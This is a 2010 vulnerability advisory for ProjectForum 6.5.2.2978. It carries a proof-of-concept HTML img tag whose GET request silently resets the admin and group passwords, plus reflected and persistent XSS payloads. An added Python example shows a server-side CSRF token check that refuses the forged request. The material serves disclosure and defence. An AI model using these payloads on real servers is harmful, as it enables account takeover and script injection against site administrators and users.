
projectforum-xsrfxss.txt

Posted on 15 May 2010

<!--
#============================================================================#
#
# Vulnerability............Cross-site Request Forgery / Cross-site Scripting
# Software.................ProjectForum 6.5.2.2978
# Download.................http://www.projectforum.com/pf/
# Date.....................5/13/10
#
#============================================================================#
#
# Site.....................http://cross-site-scripting.blogspot.com/
# Email....................john.leitch5@gmail.com
#
#============================================================================#
#
# ##Description##
#
# A cross-site request forgery vulnerability in ProjectForum 6.5.2.2978 can be exploited to reconfigure the
# server (e.g. admin password, create group password, port) with a malicious GET request.
#
#
# ##Proof of Concept##
-->
<html>
<body>
<img src="http://localhost/admin/site.html?adminpasswd=new_password&adminpasswd2=new_password&port=80&theme=default&createpasswd=new_password&createpasswd2=new_password&action=Save+Changes&formSubmitted=1" />
</body>
</html>
<!--
#
# ##Description##
#
# Several reflected and persistent cross-site scripting vulnerabilities are present.
#
#
# ##Proof of Concept##
#
# Reflected: http://localhost/1/admin/newpage.html?name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
#
# Persistent: Edit a page and add the following
# http://"onmouseover="alert(0)"style="position:absolute;top:0;left:0;width:9999px;height:9999px;
#
-->
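A server-side check that would refuse the forged GET request from the first proof of concept, given as an added example (it is not ProjectForum's code and not part of the advisory). The function names, the `csrf_token` form field, the session id and the HMAC-derived token are assumptions; the parameter names and the sample URL come from the proof of concept.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed per-process secret (assumption); a real server would load a persistent key.
SERVER_KEY = secrets.token_bytes(32)

# Settings parameters named in the advisory's proof-of-concept URL.
SENSITIVE_FIELDS = {"adminpasswd", "adminpasswd2", "createpasswd", "createpasswd2", "port"}

# The request from the proof of concept, used here as test input.
POC_URL = ("http://localhost/admin/site.html?adminpasswd=new_password"
           "&adminpasswd2=new_password&port=80&theme=default"
           "&createpasswd=new_password&createpasswd2=new_password"
           "&action=Save+Changes&formSubmitted=1")


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the admin session, embedded as a hidden field in the settings form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_settings_request(method: str, url: str, body: str, session_id: str) -> int:
    """Return the HTTP status a hardened settings handler (hypothetical) would answer with."""
    # State changes are never accepted over GET: <img> tags and navigations issue GETs.
    if method.upper() != "POST":
        return 405
    # Settings carried in the query string of a POST are refused as well.
    if SENSITIVE_FIELDS.intersection(parse_qs(urlsplit(url).query)):
        return 400
    supplied = parse_qs(body).get("csrf_token", [""])[0]
    expected = issue_csrf_token(session_id)
    # A cross-site page cannot read the admin's token, so a forged form fails here.
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return 403
    return 200


if __name__ == "__main__":
    forged_body = urlsplit(POC_URL).query  # same fields, no token
    print(check_settings_request("GET", POC_URL, "", "sess-1"))
    print(check_settings_request("POST", "http://localhost/admin/site.html", forged_body, "sess-1"))
```

The token check only holds if the XSS issues described in the second part are fixed too, since script running in the application's own origin can read the token from the form.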

 
